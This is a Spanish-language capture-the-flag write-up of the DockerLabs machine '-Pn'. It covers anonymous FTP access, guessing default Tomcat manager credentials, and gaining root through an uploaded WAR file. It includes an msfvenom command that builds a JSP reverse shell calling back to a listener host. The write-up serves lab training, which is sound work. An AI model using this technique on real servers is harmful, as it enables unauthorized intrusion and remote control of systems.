# DokckerLabs -Pn

Para poder hacer uso de esta máquina primero debemos descargar los archivos y así desplegarlo con Docker.

Descargamos el archivo de la página [dockerlabs.es/#](http://dockerlabs.es/#)

Al momento de descargar esta máquina y descomprimir el archivo, en este caso observamos 2 archivos

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722208677088/9059be88-821c-4ff9-9d71-dd5fbe9bc9d3.png align="center")

Para desplegar el laboratorio ejecutamos de la siguiente manera, así también podemos ver que nos indica la dirección que tendremos, así también el que hacer cuando terminemos este.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722208682841/b5f75051-d040-434b-a090-33affd246edd.png align="center")

Para empezar primero realizamos un escaneo de puertos y podemos observar que tenemos el puerto 21 y el 8080.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722208700002/a7c78ac5-e0cf-4ea4-83fc-20bb527e434b.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722208709632/727a4ae6-6bca-48ed-b0b8-0b265f83e241.png align="center")

Primero ingresamos al servicio FTP, ya que se puede usar el acceso anónimo. Y podemos observar que tenemos un archivo llamado tomcat.txt y copiamos el archivo en nuestra máquina usando get.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722208789215/9963901c-1620-4a6a-8673-d8c6871e1eaf.png align="center")

Leemos el archivo y podemos observar un mensaje que indica que perdieron el password.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722208805128/90afc2ac-882b-487e-b52f-2d4f0a129bb0.png align="center")

Ingresamos a la dirección web con el puerto 8080 y podemos ver la página de inicio de apache Tomcat, la cual al parecer es la versión 9.0.88.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722208811813/b34392a7-d835-4c8b-a5a4-904a5ce007bf.png align="center")

Para poder acceder en Tomcat debemos hacer clic en `managerwebapp` y nos saldrá el siguiente `popup` que nos pide ingresar las credenciales en la siguiente página encontramos una lista de credenciales por defecto [https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat) probamos cada una de ellas y la que nos permite ingresar es `s3cr3t`:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722208950171/9e947266-d82e-47c9-94fb-5383fcade6b0.png align="center")

Otra opción también es darle a cancelar y nos muestra las credenciales, aunque no siempre funciona como en este caso, nos muestra `s3cret` y ese no es el password.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722208977241/0422b709-8cb6-42de-bc39-d94e85a4dae3.png align="center")

Una vez dentro podemos observar que tenemos la opción de subir war files y mediante ello podemos conectarnos. El comando sería

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.5 LPORT=1234 -f war > shell.war
```

ejecutamos el archivo y podemos observar que ya tenemos un archivo `.war` que nos servirá para establecer una shell.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722208989267/ad565035-d649-4a5f-8ba9-ddbaf86754d6.png align="center")

Una vez tenemos el archivo y antes de subirlo iniciamos nuestro listener.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722209016120/e5f29717-3809-4ac4-9380-a5d6d3541acc.png align="center")

Una vez subido le damos a Deploy.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722209036715/c1247eda-c6ef-4696-847c-5567812a2cec.png align="center")

Si se subió de manera correcta podremos ver que en aplicaciones ya aparece nuestro archivo como `/shell`, damos clic en él y nos llevará a una página en blanco.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722209069820/8ac88728-a1a4-4ccb-94a8-5a57b8028730.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722209075479/da852c32-8ed3-493e-a724-a61cfd0abe66.png align="center")

Pero en nuestro listener ya podemos observar que se estableció conexión y si hacemos un whoami, podemos observar que no necesitamos escalar privilegios debido a que ya somos root, culminando esta máquina.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1722209246081/8e5d63da-7096-40af-a176-ef8067bd097e.png align="center")
